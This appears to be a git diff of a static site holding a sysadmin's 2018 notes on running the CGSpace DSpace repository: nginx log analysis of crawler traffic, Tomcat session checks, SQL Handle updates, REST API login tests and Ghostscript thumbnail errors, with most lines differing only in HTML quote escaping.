<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;19/Oct/2018:(12|13|14|15)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;19/Oct/2018:(12|13|14|15)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
361 207.46.13.179
395 181.115.248.74
485 66.249.64.93
@ -491,14 +491,14 @@ $ exit
$ sudo docker run --name my_solr -v ~/dspace/solr/statistics/conf:/tmp/conf -d -p 8983:8983 -t solr:5
$ sudo docker logs my_solr
...
ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics] Caused by: solr.IntField
ERROR: Error CREATEing SolrCore &#39;statistics&#39;: Unable to create core [statistics] Caused by: solr.IntField
</code></pre><ul>
<li>Apparently a bunch of variable types were removed in <a href="https://issues.apache.org/jira/browse/SOLR-5936">Solr 5</a></li>
<li>So for now it&rsquo;s actually a huge pain in the ass to run the tests for my dspace-statistics-api</li>
<li>Linode sent a message that the CPU usage was high on CGSpace (linode18) last night</li>
<li>According to the nginx logs around that time it was 5.9.6.51 (MegaIndex) again:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;20/Oct/2018:(14|15|16)&quot; | awk '{print $1}' | sort
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;20/Oct/2018:(14|15|16)&#34; | awk &#39;{print $1}&#39; | sort
| uniq -c | sort -n | tail -n 10
249 207.46.13.179
250 157.55.39.173
@ -520,12 +520,12 @@ ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics]
/var/log/nginx/oai.log:0
/var/log/nginx/rest.log:0
/var/log/nginx/statistics.log:0
# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-10-20 | sort | uniq
# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51&#39; dspace.log.2018-10-20 | sort | uniq
8915
</code></pre><ul>
<li>Last month I added &ldquo;crawl&rdquo; to the Tomcat Crawler Session Manager Valve&rsquo;s regular expression matching, and it seems to be working for MegaIndex&rsquo;s user agent:</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/1' User-Agent:'&quot;Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&quot;'
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/1&#39; User-Agent:&#39;&#34;Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&#34;&#39;
</code></pre><ul>
<li>So I&rsquo;m not sure why this bot uses so many sessionsis it because it requests very slowly?</li>
</ul>
@ -539,7 +539,7 @@ ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics]
<li>Change <code>build.properties</code> to use HTTPS for Handles in our <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a></li>
<li>We will still need to do a batch update of the <code>dc.identifier.uri</code> and other fields in the database:</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=replace(text_value, 'http://', 'https://') WHERE resource_type_id=2 AND text_value LIKE 'http://hdl.handle.net%';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=replace(text_value, &#39;http://&#39;, &#39;https://&#39;) WHERE resource_type_id=2 AND text_value LIKE &#39;http://hdl.handle.net%&#39;;
</code></pre><ul>
<li>While I was doing that I found two items using CGSpace URLs instead of handles in their <code>dc.identifier.uri</code> so I corrected those</li>
<li>I also found several items that had invalid characters or multiple Handles in some related URL field like <code>cg.link.reference</code> so I corrected those too</li>
@ -547,7 +547,7 @@ ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics]
<li>I deployed the changes on CGSpace, ran all system updates, and rebooted the server</li>
<li>Also, I updated all Handles in the database to use HTTPS:</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=replace(text_value, 'http://', 'https://') WHERE resource_type_id=2 AND text_value LIKE 'http://hdl.handle.net%';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=replace(text_value, &#39;http://&#39;, &#39;https://&#39;) WHERE resource_type_id=2 AND text_value LIKE &#39;http://hdl.handle.net%&#39;;
UPDATE 76608
</code></pre><ul>
<li>Skype with Peter about ToRs for the AReS open source work and future plans to develop tools around the DSpace ecosystem</li>
@ -560,20 +560,20 @@ UPDATE 76608
<li>I emailed the MARLO guys to ask if they can send us a dump of rights data and Handles from their system so we can tag our older items on CGSpace</li>
<li>Testing REST login and logout via httpie because Felix from Earlham says he&rsquo;s having issues:</li>
</ul>
<pre tabindex="0"><code>$ http --print b POST 'https://dspacetest.cgiar.org/rest/login' email='testdeposit@cgiar.org' password=deposit
<pre tabindex="0"><code>$ http --print b POST &#39;https://dspacetest.cgiar.org/rest/login&#39; email=&#39;testdeposit@cgiar.org&#39; password=deposit
acef8a4a-41f3-4392-b870-e873790f696b
$ http POST 'https://dspacetest.cgiar.org/rest/logout' rest-dspace-token:acef8a4a-41f3-4392-b870-e873790f696b
$ http POST &#39;https://dspacetest.cgiar.org/rest/logout&#39; rest-dspace-token:acef8a4a-41f3-4392-b870-e873790f696b
</code></pre><ul>
<li>Also works via curl (login, check status, logout, check status):</li>
</ul>
<pre tabindex="0"><code>$ curl -H &quot;Content-Type: application/json&quot; --data '{&quot;email&quot;:&quot;testdeposit@cgiar.org&quot;, &quot;password&quot;:&quot;deposit&quot;}' https://dspacetest.cgiar.org/rest/login
<pre tabindex="0"><code>$ curl -H &#34;Content-Type: application/json&#34; --data &#39;{&#34;email&#34;:&#34;testdeposit@cgiar.org&#34;, &#34;password&#34;:&#34;deposit&#34;}&#39; https://dspacetest.cgiar.org/rest/login
e09fb5e1-72b0-4811-a2e5-5c1cd78293cc
$ curl -X GET -H &quot;Content-Type: application/json&quot; -H &quot;Accept: application/json&quot; -H &quot;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&quot; https://dspacetest.cgiar.org/rest/status
{&quot;okay&quot;:true,&quot;authenticated&quot;:true,&quot;email&quot;:&quot;testdeposit@cgiar.org&quot;,&quot;fullname&quot;:&quot;Test deposit&quot;,&quot;token&quot;:&quot;e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&quot;}
$ curl -X POST -H &quot;Content-Type: application/json&quot; -H &quot;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&quot; https://dspacetest.cgiar.org/rest/logout
$ curl -X GET -H &quot;Content-Type: application/json&quot; -H &quot;Accept: application/json&quot; -H &quot;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&quot; https://dspacetest.cgiar.org/rest/status
{&quot;okay&quot;:true,&quot;authenticated&quot;:false,&quot;email&quot;:null,&quot;fullname&quot;:null,&quot;token&quot;:null}%
$ curl -X GET -H &#34;Content-Type: application/json&#34; -H &#34;Accept: application/json&#34; -H &#34;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&#34; https://dspacetest.cgiar.org/rest/status
{&#34;okay&#34;:true,&#34;authenticated&#34;:true,&#34;email&#34;:&#34;testdeposit@cgiar.org&#34;,&#34;fullname&#34;:&#34;Test deposit&#34;,&#34;token&#34;:&#34;e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&#34;}
$ curl -X POST -H &#34;Content-Type: application/json&#34; -H &#34;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&#34; https://dspacetest.cgiar.org/rest/logout
$ curl -X GET -H &#34;Content-Type: application/json&#34; -H &#34;Accept: application/json&#34; -H &#34;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&#34; https://dspacetest.cgiar.org/rest/status
{&#34;okay&#34;:true,&#34;authenticated&#34;:false,&#34;email&#34;:null,&#34;fullname&#34;:null,&#34;token&#34;:null}%
</code></pre><ul>
<li>Improve the documentatin of my <a href="https://github.com/alanorth/dspace-statistics-api">dspace-statistics-api</a></li>
<li>Email Modi and Jayashree from ICRISAT to ask if they want to join CGSpace as partners</li>

View File

@ -36,7 +36,7 @@ Send a note about my dspace-statistics-api to the dspace-tech mailing list
Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage
Today these are the top 10 IPs:
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -132,7 +132,7 @@ Today these are the top 10 IPs:
<li>Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage</li>
<li>Today these are the top 10 IPs:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Nov/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Nov/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1300 66.249.64.63
1384 35.237.175.180
1430 138.201.52.218
@ -152,7 +152,7 @@ Today these are the top 10 IPs:
</code></pre><ul>
<li>They at least seem to be re-using their Tomcat sessions:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=84.38.130.177' dspace.log.2018-11-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=84.38.130.177&#39; dspace.log.2018-11-03
342
</code></pre><ul>
<li><code>50.116.102.77</code> is also a regular REST API user</li>
@ -163,7 +163,7 @@ Today these are the top 10 IPs:
</code></pre><ul>
<li>And it doesn&rsquo;t seem they are re-using their Tomcat sessions:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=138.201.52.218' dspace.log.2018-11-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=138.201.52.218&#39; dspace.log.2018-11-03
1243
</code></pre><ul>
<li>Ah, we&rsquo;ve apparently seen this server exactly a year ago in 2017-11, making 40,000 requests in one day&hellip;</li>
@ -171,7 +171,7 @@ Today these are the top 10 IPs:
<li>Linode sent a mail that CGSpace (linode18) is using high outgoing bandwidth</li>
<li>Looking at the nginx logs again I see the following top ten IPs:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Nov/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Nov/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1979 50.116.102.77
1980 35.237.175.180
2186 207.46.13.156
@ -189,9 +189,9 @@ Today these are the top 10 IPs:
</code></pre><ul>
<li>It&rsquo;s making lots of requests, though actually it does seem to be re-using its Tomcat sessions:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18&#39; dspace.log.2018-11-03
8449
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18&#39; dspace.log.2018-11-03 | sort | uniq | wc -l
1
</code></pre><ul>
<li><em>Updated on 2018-12-04 to correct the grep command above, as it was inaccurate and it seems the bot was actually already re-using its Tomcat sessions</em></li>
@ -200,7 +200,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
<li>I think it&rsquo;s reasonable for a human to click one of those links five or ten times a minute&hellip;</li>
<li>To contrast, <code>78.46.89.18</code> made about 300 requests per minute for a few hours today:</li>
</ul>
<pre tabindex="0"><code># grep 78.46.89.18 /var/log/nginx/access.log | grep -o -E '03/Nov/2018:[0-9][0-9]:[0-9][0-9]' | sort | uniq -c | sort -n | tail -n 20
<pre tabindex="0"><code># grep 78.46.89.18 /var/log/nginx/access.log | grep -o -E &#39;03/Nov/2018:[0-9][0-9]:[0-9][0-9]&#39; | sort | uniq -c | sort -n | tail -n 20
286 03/Nov/2018:18:02
287 03/Nov/2018:18:21
289 03/Nov/2018:18:23
@ -232,7 +232,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
<li>Linode emailed about the CPU load and outgoing bandwidth on CGSpace (linode18) again</li>
<li>Here are the top ten IPs active so far this morning:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;04/Nov/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;04/Nov/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1083 2a03:2880:11ff:2::face:b00c
1105 2a03:2880:11ff:d::face:b00c
1111 2a03:2880:11ff:f::face:b00c
@ -246,15 +246,15 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
</code></pre><ul>
<li><code>78.46.89.18</code> is back&hellip; and it is still actually re-using its Tomcat sessions:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18&#39; dspace.log.2018-11-04
8765
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18&#39; dspace.log.2018-11-04 | sort | uniq | wc -l
1
</code></pre><ul>
<li><em>Updated on 2018-12-04 to correct the grep command and point out that the bot was actually re-using its Tomcat sessions properly</em></li>
<li>Also, now we have a ton of Facebook crawlers:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;04/Nov/2018&quot; | grep &quot;2a03:2880:11ff:&quot; | awk '{print $1}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;04/Nov/2018&#34; | grep &#34;2a03:2880:11ff:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
905 2a03:2880:11ff:b::face:b00c
955 2a03:2880:11ff:5::face:b00c
965 2a03:2880:11ff:e::face:b00c
@ -275,7 +275,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
</code></pre><ul>
<li>They are really making shit tons of requests:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-04
37721
</code></pre><ul>
<li><em>Updated on 2018-12-04 to correct the grep command to accurately show the number of requests</em></li>
@ -286,7 +286,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
<li>I will add it to the Tomcat Crawler Session Manager valve</li>
<li>Later in the evening&hellip; ok, this Facebook bot is getting super annoying:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;04/Nov/2018&quot; | grep &quot;2a03:2880:11ff:&quot; | awk '{print $1}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;04/Nov/2018&#34; | grep &#34;2a03:2880:11ff:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
1871 2a03:2880:11ff:3::face:b00c
1885 2a03:2880:11ff:b::face:b00c
1941 2a03:2880:11ff:8::face:b00c
@ -307,15 +307,15 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
</code></pre><ul>
<li>Now at least the Tomcat Crawler Session Manager Valve seems to be forcing it to re-use some Tomcat sessions:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-04
37721
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-04 | sort | uniq | wc -l
15206
</code></pre><ul>
<li>I think we still need to limit more of the dynamic pages, like the &ldquo;most popular&rdquo; country, item, and author pages</li>
<li>It seems these are popular too, and there is no fucking way Facebook needs that information, yet they are requesting thousands of them!</li>
</ul>
<pre tabindex="0"><code># grep 'face:b00c' /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -c 'most-popular/'
<pre tabindex="0"><code># grep &#39;face:b00c&#39; /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -c &#39;most-popular/&#39;
7033
</code></pre><ul>
<li>I added the &ldquo;most-popular&rdquo; pages to the list that return <code>X-Robots-Tag: none</code> to try to inform bots not to index or follow those pages</li>
@ -325,20 +325,20 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11
<ul>
<li>I wrote a small Python script <a href="https://gist.github.com/alanorth/4ff81d5f65613814a66cb6f84fdf1fc5">add-dc-rights.py</a> to add usage rights (<code>dc.rights</code>) to CGSpace items based on the CSV Hector gave me from MARLO:</li>
</ul>
<pre tabindex="0"><code>$ ./add-dc-rights.py -i /tmp/marlo.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-dc-rights.py -i /tmp/marlo.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>The file <code>marlo.csv</code> was cleaned up and formatted in Open Refine</li>
<li>165 of the items in their 2017 data are from CGSpace!</li>
<li>I will add the data to CGSpace this week (done!)</li>
<li>Jesus, is Facebook <em>trying</em> to be annoying? At least the Tomcat Crawler Session Manager Valve is working to force the bot to re-use its Tomcat sessions:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;05/Nov/2018&quot; | grep -c &quot;2a03:2880:11ff:&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;05/Nov/2018&#34; | grep -c &#34;2a03:2880:11ff:&#34;
29889
# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-05
# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-05
29763
# grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-05 | sort | uniq | wc -l
# grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-05 | sort | uniq | wc -l
1057
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;05/Nov/2018&quot; | grep &quot;2a03:2880:11ff:&quot; | grep -c -E &quot;(handle|bitstream)&quot;
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;05/Nov/2018&#34; | grep &#34;2a03:2880:11ff:&#34; | grep -c -E &#34;(handle|bitstream)&#34;
29896
</code></pre><ul>
<li>29,000 requests from Facebook and none of the requests are to the dynamic pages I rate limited yesterday!</li>
@ -403,8 +403,8 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11
<ul>
<li>Testing corrections and deletions for AGROVOC (<code>dc.subject</code>) that Sisay and Peter were working on earlier this month:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-11-19-correct-agrovoc.csv -f dc.subject -t correct -m 57 -db dspace -u dspace -p 'fuu' -d
$ ./delete-metadata-values.py -i 2018-11-19-delete-agrovoc.csv -f dc.subject -m 57 -db dspace -u dspace -p 'fuu' -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-11-19-correct-agrovoc.csv -f dc.subject -t correct -m 57 -db dspace -u dspace -p &#39;fuu&#39; -d
$ ./delete-metadata-values.py -i 2018-11-19-delete-agrovoc.csv -f dc.subject -m 57 -db dspace -u dspace -p &#39;fuu&#39; -d
</code></pre><ul>
<li>Then I ran them on both CGSpace and DSpace Test, and started a full Discovery re-index on CGSpace:</li>
</ul>
@ -497,7 +497,7 @@ $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
<li>Linode alerted me that the outbound traffic rate on CGSpace (linode19) was very high</li>
<li>The top users this morning are:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;27/Nov/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;27/Nov/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
229 46.101.86.248
261 66.249.64.61
447 66.249.64.59

View File

@ -36,7 +36,7 @@ Then I ran all system updates and restarted the server
I noticed that there is another issue with PDF thumbnails on CGSpace, and I see there was another Ghostscript vulnerability last week
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -135,8 +135,8 @@ I noticed that there is another issue with PDF thumbnails on CGSpace, and I see
<ul>
<li>The error when I try to manually run the media filter for one item from the command line:</li>
</ul>
<pre tabindex="0"><code>org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d&quot; &quot;-f/tmp/magick-129895Bmp44lvUfxo&quot; &quot;-f/tmp/magick-12989C0QFG51fktLF&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d&quot; &quot;-f/tmp/magick-129895Bmp44lvUfxo&quot; &quot;-f/tmp/magick-12989C0QFG51fktLF&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
<pre tabindex="0"><code>org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d&#34; &#34;-f/tmp/magick-129895Bmp44lvUfxo&#34; &#34;-f/tmp/magick-12989C0QFG51fktLF&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d&#34; &#34;-f/tmp/magick-129895Bmp44lvUfxo&#34; &#34;-f/tmp/magick-12989C0QFG51fktLF&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
at org.im4java.core.Info.getBaseInfo(Info.java:360)
at org.im4java.core.Info.&lt;init&gt;(Info.java:151)
at org.dspace.app.mediafilter.ImageMagickThumbnailFilter.getImageFile(ImageMagickThumbnailFilter.java:142)
@ -158,13 +158,13 @@ org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.c
<li>For what it&rsquo;s worth, I get the same error on my local Arch Linux environment with Ghostscript 9.26:</li>
</ul>
<pre tabindex="0"><code>$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=pngalpha -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Food\ safety\ Kenya\ fruits.pdf
DEBUG: FC_WEIGHT didn't match
DEBUG: FC_WEIGHT didn&#39;t match
zsh: segmentation fault (core dumped) gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
</code></pre><ul>
<li>When I replace the <code>pngalpha</code> device with <code>png16m</code> as suggested in the StackOverflow comments it works:</li>
</ul>
<pre tabindex="0"><code>$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=png16m -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Food\ safety\ Kenya\ fruits.pdf
DEBUG: FC_WEIGHT didn't match
DEBUG: FC_WEIGHT didn&#39;t match
</code></pre><ul>
<li>Start proofing the latest round of 226 IITA archive records that Bosede sent last week and Sisay uploaded to DSpace Test this weekend (<a href="https://dspacetest.cgiar.org/handle/10568/108298">IITA_Dec_1_1997 aka Daniel1807</a>)
<ul>
@ -203,7 +203,7 @@ DEBUG: FC_WEIGHT didn't match
</ul>
<pre tabindex="0"><code>$ identify Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf\[0\]
Info Note Mainstreaming gender and social differentiation into CCAFS research activities in West Africa-converted.pdf[0]=&gt;Info Note Mainstreaming gender and social differentiation into CCAFS research activities in West Africa-converted.pdf PDF 595x841 595x841+0+0 16-bit sRGB 107443B 0.000u 0:00.000
identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1746.
identify: CorruptImageProfile `xmp&#39; @ warning/profile.c/SetImageProfileInternal/1746.
</code></pre><ul>
<li>And wow, I can&rsquo;t even run ImageMagick&rsquo;s <code>identify</code> on the first page of the second item (10568/98930):</li>
</ul>
@ -213,7 +213,7 @@ zsh: abort (core dumped) identify Food\ safety\ Kenya\ fruits.pdf\[0\]
<li>But with GraphicsMagick&rsquo;s <code>identify</code> it works:</li>
</ul>
<pre tabindex="0"><code>$ gm identify Food\ safety\ Kenya\ fruits.pdf\[0\]
DEBUG: FC_WEIGHT didn't match
DEBUG: FC_WEIGHT didn&#39;t match
Food safety Kenya fruits.pdf PDF 612x792+0+0 DirectClass 8-bit 1.4Mi 0.000u 0m:0.000002s
</code></pre><ul>
<li>Interesting that ImageMagick&rsquo;s <code>identify</code> <em>does</em> work if you do not specify a page, perhaps as <a href="https://bugs.ghostscript.com/show_bug.cgi?id=699815">alluded to in the recent Ghostscript bug report</a>:</li>
@ -224,20 +224,20 @@ Food safety Kenya fruits.pdf[1] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010
Food safety Kenya fruits.pdf[2] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
Food safety Kenya fruits.pdf[3] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
Food safety Kenya fruits.pdf[4] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1746.
identify: CorruptImageProfile `xmp&#39; @ warning/profile.c/SetImageProfileInternal/1746.
</code></pre><ul>
<li>As I expected, ImageMagick cannot generate a thumbnail, but GraphicsMagick can (though it looks like crap):</li>
</ul>
